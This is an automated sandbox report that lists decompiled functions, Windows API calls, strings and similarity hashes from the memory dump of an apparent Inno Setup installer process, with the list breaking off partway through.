Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
API String ID: 1452528299-1392080489
Opcode ID: c286603e53affe3164ac709bf1677ea308550fd49908d7968442762721e1a6d7
Instruction ID: 347a891959e149457f48b0f3345d32151ec8ee34e2497667e3b9f3a3b6e0af3f
Opcode Fuzzy Hash: c286603e53affe3164ac709bf1677ea308550fd49908d7968442762721e1a6d7
Instruction Fuzzy Hash: 0A018634E082986ACB04E7EF94417EDFBE49F09304F54C1EFA465E7242DBB84A0447BA

Uniqueness

Uniqueness Score: -1.00%

Function 004B0A08, Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,?,?,?,004B73CF), ref: 004B0A44
RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,?,004B73CF), ref: 004B0A4D
RemoveFontResourceW.GDI32(00000000), ref: 004B0A5A
SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004B0A6E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
String ID:
API String ID: 4283692357-0
Opcode ID: 7c0f644a18461cd170c3e2b56d58ce41b8dec2de3dab6eafaab90492cc94437b
Instruction ID: 68f3d6a6108326f095a0386f20cc17951fd509f527c3e1173e60b2f3b34f874f
Opcode Fuzzy Hash: 7c0f644a18461cd170c3e2b56d58ce41b8dec2de3dab6eafaab90492cc94437b
Instruction Fuzzy Hash: C2F030B174031126E610B6B65C46F9B62CC5B48748F11883AB645EB2C3D97CDC04476D

Uniqueness

Uniqueness Score: -1.00%

Function 004CF09C, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000), ref: 004CF0EE

Strings

Failed to set NTFS compression state (%d)., xrefs: 004CF0FF
Unsetting NTFS compression on file: %s, xrefs: 004CF0D3
Setting NTFS compression on file: %s, xrefs: 004CF0BB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
API String ID: 1452528299-3038984924
Opcode ID: 040bdf9b79c7d369991a93a611eb29db332c47a1e2e030a57f69ef3c55a9956b
Instruction ID: 625f54abb4345d6cc1b160893d1d660a8fc8661cb2ee44145cf886f93456dc92
Opcode Fuzzy Hash: 040bdf9b79c7d369991a93a611eb29db332c47a1e2e030a57f69ef3c55a9956b
Instruction Fuzzy Hash: F1016730D042489ACB0597AE94517DDFBE59F09304F44C1FFA465E7242DABD4A08476A

Uniqueness

Uniqueness Score: -1.00%

Function 004589A4, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 004589B1
GetCurrentProcessId.KERNEL32(00000000,?,?,00000000,00000000,00458A1C,-000000F4,?,?,004585DE,?,-0000000C,?), ref: 004589BA
GlobalFindAtomW.KERNEL32(00000000), ref: 004589CF
GetPropW.USER32 ref: 004589E6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 02dd8a062a381729000d46ead6dfb8f7d2f5d6fbe194fcf8eb24a44b854f72ac
Instruction ID: c5b696a72588346249ad42f44ef6febf25fa79375e452dd96b9cf53597f99a7f
Opcode Fuzzy Hash: 02dd8a062a381729000d46ead6dfb8f7d2f5d6fbe194fcf8eb24a44b854f72ac
Instruction Fuzzy Hash: 44F0A792212122A6E6227B7B5C8597F328CAD00315300423FFC80E6197DF2DCC8991BF

Uniqueness

Uniqueness Score: -1.00%

Function 004FE5D0, Relevance: 6.0, APIs: 4, Instructions: 35filesynchronizationCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE5D9
DeleteFileW.KERNEL32(00000000,00000000,00000000,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE5E7
ReleaseMutex.KERNEL32(00000000,004FE640,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE62A
CloseHandle.KERNEL32(00000000,00000000,004FE640,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE633

Strings

/REGU, xrefs: 004FE2EE
.lst, xrefs: 004FE3B4
/REG, xrefs: 004FE2CA
.msg, xrefs: 004FE39A
Inno-Setup-RegSvr-Mutex, xrefs: 004FE325
Setup, xrefs: 004FE306

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFile$CloseHandleMutexRelease
String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 3118534315-3672972446
Opcode ID: 61a862fc2eb98e984e2fe091c2f2a8db501d7df1cfe8c6f4cfcf95249462159a
Instruction ID: a01dffca68a05d34cbb6413aea90befd7ed39e7fb173efff64097f4da04a2672
Opcode Fuzzy Hash: 61a862fc2eb98e984e2fe091c2f2a8db501d7df1cfe8c6f4cfcf95249462159a
Instruction Fuzzy Hash: 56F0BB315082089EEB01EBB6D81296E77A8DB45304BA2083BF500E25A2C63D4C11C65C

Uniqueness

Uniqueness Score: -1.00%

Function 0047A5A0, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0047A5B8
SetWindowsHookExW.USER32(00000003,0047A55C,00000000,00000000), ref: 0047A5C8
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,0047DB9B), ref: 0047A5E3
CreateThread.KERNEL32 ref: 0047A608

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: fce3583073313e64405e8b32e39b1966a418c3b0a299ade769e8da19304fed34
Instruction ID: 5af294596652428082a2d10271691ea12361138bf71b4d4e0de4d4f74ec09c2b
Opcode Fuzzy Hash: fce3583073313e64405e8b32e39b1966a418c3b0a299ade769e8da19304fed34
Instruction Fuzzy Hash: 25F03071684344BEF7109B61ECABF6E3798A365705F54402AF30C6A2D1C3B81C99E71A

Uniqueness

Uniqueness Score: -1.00%

Function 004D8C08, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008), ref: 004D8C11
OpenProcessToken.ADVAPI32(00000000,00000008), ref: 004D8C17
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 004D8C39
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 004D8C4A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 5bcbce72d852c5a1335da14f4dc560f83ffe5a940589a3dd3dd66595e71332d7
Instruction ID: 51fa21f25c06e328c69f26ed10c7d9100417013b7cd6ce2efd1497f92d756bd2
Opcode Fuzzy Hash: 5bcbce72d852c5a1335da14f4dc560f83ffe5a940589a3dd3dd66595e71332d7
Instruction Fuzzy Hash: 6CF012716153007BD70096B58C81E5773DC9B44754F04483E7E54D72C1EA39DD489666

Uniqueness

Uniqueness Score: -1.00%

Function 0043736C, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00437375
SelectObject.GDI32(00000000,058A00B4), ref: 00437387
GetTextMetricsW.GDI32(00000000,?,00000000), ref: 00437392
ReleaseDC.USER32 ref: 004373A3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 2907fb977446ebac350a592686c43b06d3a805bdf8fdaa2d33c3e9d59b490aac
Instruction ID: 58c6ea5530ae4f5a6a63de3346d4281161ca75ef2694c6dcad3afc0a28ef6ed2
Opcode Fuzzy Hash: 2907fb977446ebac350a592686c43b06d3a805bdf8fdaa2d33c3e9d59b490aac
Instruction Fuzzy Hash: 3DE048517066B126D76161664C83BDF25484F06275F08112AFD84E92D3EA1DCD01E2FA

Uniqueness

Uniqueness Score: -1.00%

Function 00470E14, Relevance: 6.0, APIs: 4, Instructions: 24threadCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00470E1A
EnumWindows.USER32(00470DDC), ref: 00470E33
GetCurrentThreadId.KERNEL32 ref: 00470E42
EnumThreadWindows.USER32(00000000,00470DBC), ref: 00470E48

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumThreadWindows$ActiveCurrentWindow
String ID:
API String ID: 1202916826-0
Opcode ID: 8663e4fa51a25b22250b6f616eba7e7924732261bf014aeab7ed04c21ec16752
Instruction ID: 7712d82115595b5bbe0424392478e81f51976f73aa844afc3d5bfb08cee64333
Opcode Fuzzy Hash: 8663e4fa51a25b22250b6f616eba7e7924732261bf014aeab7ed04c21ec16752
Instruction Fuzzy Hash: 60E0865168D340BAF60062B60C027AA7AC8CA82324F14892FFCE8A72C3D53D4C05627F

Uniqueness

Uniqueness Score: -1.00%

Function 004A0690, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004A07AE

Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1

Strings

LQH, xrefs: 004A06EF
Variant is null, cannot invoke, xrefs: 004A06E8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$FreeLoad
String ID: LQH$Variant is null, cannot invoke
API String ID: 62760895-3362311783
Opcode ID: e00ff518b07a38c679171dfb521fb24418a68dbbfc2ee5892375a28d1e188b10
Instruction ID: 4281f03da930e244770ebd361fafc753e52955df40b18311f485a30cc41cdd94
Opcode Fuzzy Hash: e00ff518b07a38c679171dfb521fb24418a68dbbfc2ee5892375a28d1e188b10
Instruction Fuzzy Hash: D3C19E74A002099FCB10DFA9C981A9EB7F5FF59314F24803AE804EB351D779AD46CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0048410C, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0048440A

Strings

H, xrefs: 004841C1
48H, xrefs: 00484160

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString
String ID: 48H$H
API String ID: 3341692771-1350225257
Opcode ID: 57153d850ff5c1ada33f49336ce6d8587e68e96bab4bfb2cfc2a608684ad3357
Instruction ID: 6209862446b9a05c525dd6954695b70c720c436fc9378fb4ce7688ec02123eb0
Opcode Fuzzy Hash: 57153d850ff5c1ada33f49336ce6d8587e68e96bab4bfb2cfc2a608684ad3357
Instruction Fuzzy Hash: 34B1F374A01609EFDB10DF99D880A9EBBF1FF89314F24856AE805AB361D738AC45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004591EC, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

Part of subcall function 00458068: ReleaseCapture.USER32(00000000,00459263,00000000,0045948F,?,00000000,00459501), ref: 0045806B

SetCursor.USER32(00000000,00000000,0045948F,?,00000000,00459501), ref: 0045937B

Part of subcall function 00465C20: ImageList_EndDrag.COMCTL32(?,-0000000C,00458D31), ref: 00465C3C

Strings

(GE, xrefs: 00459271
4YE, xrefs: 004592A2

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureCursorDragImageList_Release
String ID: (GE$4YE
API String ID: 1302740870-2190304079
Opcode ID: fa85aa817cd9fdabc5cdb3c8586efa1e742f29c56f8d9a493dd33b3b227ba4cf
Instruction ID: 677554ce33e139bb7db45c3ece7d7f38f200c479743da055978665404f5ebb31
Opcode Fuzzy Hash: fa85aa817cd9fdabc5cdb3c8586efa1e742f29c56f8d9a493dd33b3b227ba4cf
Instruction Fuzzy Hash: BE81A170604244DFEB05CF65D894B6E7BE1FBAD305F1481AAE840873A2C7789C4DDB95

Uniqueness

Uniqueness Score: -1.00%

Function 00458FB4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

0bE, xrefs: 00459082, 004590B8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0bE
API String ID: 0-2320990392
Opcode ID: 31eb10cffd57188306950af299ddb2536fea8b613e6fe82967d0a6544230c81b
Instruction ID: ab28fe0629281bc3a8d619394c7c62e31fb3bd75857d63831c3b6f351b1356e2
Opcode Fuzzy Hash: 31eb10cffd57188306950af299ddb2536fea8b613e6fe82967d0a6544230c81b
Instruction Fuzzy Hash: E551C930A00605DFDB00DF59C881A9EBBF5FF98315F1184AAEC04A7392D779AD89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411074, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,00411187,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00411090

Strings

<*P, xrefs: 0041111D
X*P, xrefs: 00411142

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LocaleThread
String ID: <*P$X*P
API String ID: 635194068-628368254
Opcode ID: 52dc1b13e0e2b0ffdd653057525880b3fe53e6f7c7912d1678e4b8d21896f8ab
Instruction ID: 5836da1b360b6cbb10a15eeaf75eb8dd80c660c823a45f6c764e19074c377661
Opcode Fuzzy Hash: 52dc1b13e0e2b0ffdd653057525880b3fe53e6f7c7912d1678e4b8d21896f8ab
Instruction Fuzzy Hash: 5731C871F005086FD704DB45C882EAE7BADE788314F65447BFA09DB381D939ED818369

Uniqueness

Uniqueness Score: -1.00%

Function 004CA858, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

Failed to proceed to next wizard page; aborting., xrefs: 004CA97D
Failed to proceed to next wizard page; showing wizard., xrefs: 004CA991

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: 44a93b1b6f51d210a68e346e6d389893f64001353d84ba68bde8d76b186d9a66
Instruction ID: 2fa476e9e15c605937f36451e80abbd2f9e2a8d9220714e0aa7a3a78324d731e
Opcode Fuzzy Hash: 44a93b1b6f51d210a68e346e6d389893f64001353d84ba68bde8d76b186d9a66
Instruction Fuzzy Hash: FF41BD78A046489FD701EB69C985F9A73F0EB05318F1504EAF5008B3A2C778AE54DF2A

Uniqueness

Uniqueness Score: -1.00%

Function 00468B5C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON

Download Yara Rule

Strings

@, xrefs: 00468B71
0bE, xrefs: 00468C3A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
